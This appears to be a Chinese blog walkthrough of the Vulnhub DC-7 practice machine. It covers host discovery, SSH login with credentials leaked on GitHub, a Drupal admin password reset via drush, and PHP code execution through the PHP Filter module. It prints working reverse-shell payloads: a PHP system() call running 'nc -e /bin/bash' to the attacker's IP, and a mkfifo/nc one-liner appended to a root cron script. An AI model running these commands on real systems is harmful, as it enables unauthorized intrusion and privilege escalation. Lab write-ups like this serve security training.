Vulnhub实战靶场:DC-7

一、环境搭建

1、官网下载连接:https://www.vulnhub.com/entry/dc-7,356/

2、下载之后,使用Oracle VM VirtualBox导入靶场环境

3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

二、靶场攻略

1、惯例,使用命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 10.10.114.0/24,快速探测存活主机,找到靶场ip

 2、探测启动的服务端口:nmap -A -p- 10.10.114.87

 

 3、访问端口,看到首页提示,暴力破解不能用,尝试登录失败五次会锁定,msf中直接打的exp也没打进去

4、按照官网提示,可以在google里得到帮助,关键字跟网站下@DC7USER一样,就搜索了一下这个人

 发现了github账户,账户下有网站源码文件,里面有配置文件信息

 尝试登录网站发现不对

 尝试登录ssh,原来是ssh的账号密码

 5、使用命令ls,查看到有一个邮件

 查看邮件,发现几个关键脚本文件

 查看backups.sh文件,是一个定时root执行的备份文件的脚本

 drush是对密码进行操作的命令

 知道有admin账户,所以修改密码,输入命令:drush user-password  admin --password="nihao123!"

 重新去登录网站,登录成功

 6、打开管理页面去安装一个PHP扩展方便写入木马,扩展程序下载连接为:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz,下载完成之后,到管理的扩展界面,安装新插件即可

安装完成之后,多出了一个PHP Filter

 启动扩展之后,到编辑菜单,编辑首页内容,内容代码选择php code,之后在内容中加入<?php phpinfo();?>,发现成功执行

 

 7、在文本中,写入要执行的反弹shell的命令:<?php system('nc -e /bin/bash 10.10.114.76 2345');>,kali攻击机使用nc接收之后,顺利拿到www账户的shell

再使用命令:python -c "import pty;pty.spawn('/bin/bash')",拿到www权限的交互shell

 8、到备份脚本的页面,查看权限,知道只有root和www账户有对自动运行的backups.sh脚本有编辑权限

 使用命令:echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.114.76 3456 >/tmp/f" >> backups.sh,将反弹shell的命令,写入到backups.sh中

等一段时间,备份脚本以root账户自动执行之后,顺利拿到root权限的shell,得到flag

 完

原文地址:https://www.cnblogs.com/sym945/p/13926313.html